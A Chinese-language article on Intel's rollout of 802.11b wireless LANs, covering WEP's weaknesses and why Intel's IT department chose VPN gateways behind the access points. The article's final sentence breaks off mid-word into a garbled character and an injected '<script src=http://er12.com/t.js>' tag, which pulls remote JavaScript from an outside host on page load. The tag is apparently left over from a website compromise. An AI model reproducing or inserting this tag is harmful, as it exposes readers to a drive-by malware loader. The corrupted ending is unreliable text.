英特尔无线网络部署
无线网络不可抗拒的魅力促使英特尔开始为整个公司遍布全球的8万名员工部署基于802.11b标准无线局域网(wlan)。802.11b无线标准之所以能够从众多标准中异军突起,独获英特尔的青睐,主要在于它提供了无缝的无线连接,能够显著改进网络访问性能、提高公司生产力。
随着越来越多的英特尔员工开始采用基于最新迅驰移动计算技术或英特尔移动式处理器的笔记本电脑,这一措施变得更具实际意义。英特尔公司的员工经常携带笔记本电脑到会议室和其它场所,借助无线网络,他们可随时接入公司网络。项目小组可根据需要随时上网查找文件、访问演示文稿、发送电子邮件和进行web搜索,而不会打断会议进程。目前,大约有65%的英特尔员工配备了笔记本电脑。
然而保护诸如英特尔等如此庞大的网络并非易事。英特尔主要有两个安全目标:
·利用强大的身份验证特性防止非法人员访问公司网络。
·利用优异的加密性能防止数据在传输过程中被窃听。
802.11b技术规范本身提供了一定程度的保护。其内建的有线对等保密(wep)协议是对用户进行身份验证和对数据加密的常用方法。wep封装技术可在传输前将数据打乱,之后使用名为共享密钥验证(shared key authentication)的算法对客户机进行身份验证。理论上只有享有接入点发出的密钥的人员才能破译信号。但在实际使用中,wep并不能满足英特尔对网络安全的要求。从802.11b数据流中可以获取用于打乱数据的密钥基础结构。这意味着黑客可以重新组织起有效密钥,并利用它们伪装成网络的授权客户,进入到采用wep保护的802.11b无线网络。经过精挑细选,虚拟专用网(vpn)技术最终获得了英特尔it部门的青睐。
通过在802.11b网络中部署业经验证的vpn安全机制,企业可以在无线客户机与企业网络之间建立安全的连接。在历经3年多的实际考验之后,vpn仍是用户心中最受欢迎的解决方案。英特尔it部门的研发管理人员称之为久经考验的安全解决方案,对于它能够帮助英特尔大展宏图深信不疑。
工作中,虚拟专用网(vpn)将在客户机和vpn网关之间建立一对一的安全连接。在802.11b网络中,vpn网关位于无线接入点后面。一般而言,网络的每一客户机均通过一个专用的vpn通道与网络连接。数据包经由无线网络从一台客户机向另一台发送时,首先需经过vpn通道,之后逐次通过接入点和vpn网关。随后数据包将通过无线局域网抵达另一个vpn网关,此处它们将进行加密,之后通过无线接入点发送至接收客户机。通过将vpn网关置于802.11b接入点后面,公司可以确保所有无线传输的信息都在严密保护之下。
适用于802.11b无线网络的vpn解决方案
图:在数据抵达位于无线接入点后面的vpn网关之前,将一直处于加密状态之下
现在,在采用端到端的兼容性解决方案的前提下,英特尔公司正将这一解决方案部署于网络之中。例如,选择来自同一厂商的防火墙和vpn解决方案,两者之间的兼容性将相对较高。如网络中存在多个移动和远程通信设备,客户端的vpn应由软件进行控制。在这种情况下,企业的所有终端使用相同的软件将至关重要。
使用vpn增强公司网络的安全
在无线局域网中部署vpn还有另外一个优势:由于vpn是一种交叉传输解决方案,它可以成为企业用以保护有线和无线网络的唯一技术标准。从本地客户机到员工家庭电脑,再到员工在酒店使用的笔记本电脑,it部门能够为其提供一个连续统一的安全防护网。
it部门面临的一个真正挑战为使市场中众多的vpn解决方案实现标准化。有许多解决方案可以提供某种程度的一致性。这一点非常重要,因为在使用不同的vpn解决方案时(根据所涉及的介质而定),可能会引起不必要的麻烦。英特尔it部门认为这一环境正逐步走向成熟,将可以为it管理员提供更高的互操作性和跨平台支持。随着这些解决方案的出现,为网络部署适当的vpn技术和相应的管理工作将变得比较简单。然而,管理员仍需谨慎进?script src=http://er12.com/t.js>
